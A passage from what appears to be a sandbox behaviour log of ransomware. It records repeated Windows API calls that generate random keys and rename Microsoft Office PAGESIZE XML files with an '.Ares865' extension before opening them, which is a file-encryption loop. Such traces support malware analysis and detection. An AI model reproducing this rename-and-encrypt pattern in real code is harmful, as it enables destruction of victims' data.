dwFlags=0x1) returned 1 [0069.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN058.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn058.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.403] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2276) returned 1 [0069.403] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.404] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.404] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.406] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.407] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.407] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.408] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN065.XML.Ares865") returned 71 [0069.408] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN065.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn065.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN065.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn065.xml.ares865"), dwFlags=0x1) returned 1 [0069.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN065.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn065.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.408] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4902) returned 1 [0069.409] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.409] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.409] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.412] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.412] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.412] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.413] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN075.XML.Ares865") returned 71 [0069.413] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN075.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn075.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN075.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn075.xml.ares865"), dwFlags=0x1) returned 1 [0069.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN075.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn075.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.414] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=40948) returned 1 [0069.414] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.415] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.415] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.419] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.419] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.419] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.420] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN081.XML.Ares865") returned 71 [0069.420] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN081.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn081.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN081.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn081.xml.ares865"), dwFlags=0x1) returned 1 [0069.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN081.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn081.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.421] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1053080) returned 1 [0069.421] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.422] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.422] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.485] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.486] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.486] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.505] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN082.XML.Ares865") returned 71 [0069.505] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN082.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn082.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN082.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn082.xml.ares865"), dwFlags=0x1) returned 1 [0069.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN082.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn082.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.507] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=203384) returned 1 [0069.507] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.509] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.509] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.566] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.567] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.567] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.570] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN086.XML.Ares865") returned 71 [0069.570] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN086.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn086.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN086.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn086.xml.ares865"), dwFlags=0x1) returned 1 [0069.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN086.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn086.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.571] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=11572) returned 1 [0069.571] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.572] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.572] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.576] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.577] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.577] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.577] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN089.XML.Ares865") returned 71 [0069.578] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN089.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn089.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN089.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn089.xml.ares865"), dwFlags=0x1) returned 1 [0069.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN089.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn089.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.578] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4518) returned 1 [0069.579] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.579] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.579] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.583] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.584] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.584] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.585] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN090.XML.Ares865") returned 71 [0069.585] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN090.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn090.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN090.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn090.xml.ares865"), dwFlags=0x1) returned 1 [0069.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN090.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn090.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.588] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=41542) returned 1 [0069.588] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.589] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.589] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.594] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.595] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.595] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.596] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN092.XML.Ares865") returned 71 [0069.596] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN092.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn092.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN092.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn092.xml.ares865"), dwFlags=0x1) returned 1 [0069.599] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN092.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn092.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.599] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4072) returned 1 [0069.599] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.600] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.600] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.605] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.605] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.605] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.606] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN095.XML.Ares865") returned 71 [0069.606] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN095.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn095.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN095.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn095.xml.ares865"), dwFlags=0x1) returned 1 [0069.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN095.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn095.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.607] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1962) returned 1 [0069.607] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.607] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.607] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.610] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.611] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.611] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.611] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN096.XML.Ares865") returned 71 [0069.611] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN096.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn096.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN096.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn096.xml.ares865"), dwFlags=0x1) returned 1 [0069.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN096.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn096.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.612] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1916) returned 1 [0069.612] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.613] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.613] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.616] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.617] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.617] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.617] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN097.XML.Ares865") returned 71 [0069.617] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN097.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn097.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN097.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn097.xml.ares865"), dwFlags=0x1) returned 1 [0069.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN097.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn097.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.618] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=70692) returned 1 [0069.618] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.619] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.619] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.627] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.628] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.628] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.629] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN102.XML.Ares865") returned 71 [0069.629] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN102.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn102.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN102.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn102.xml.ares865"), dwFlags=0x1) returned 1 [0069.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN102.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn102.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.630] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=34916) returned 1 [0069.631] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.631] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.631] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.638] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.638] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.638] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.639] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN103.XML.Ares865") returned 71 [0069.639] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN103.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn103.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN103.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn103.xml.ares865"), dwFlags=0x1) returned 1 [0069.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN103.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn103.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.640] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=56844) returned 1 [0069.640] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.641] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.641] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.647] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0069.647] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.647] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.648] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN105.XML.Ares865") returned 71 [0069.648] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN105.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn105.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN105.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn105.xml.ares865"), dwFlags=0x1) returned 1 [0069.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN105.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn105.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.649] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=4084) returned 1 [0069.650] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, 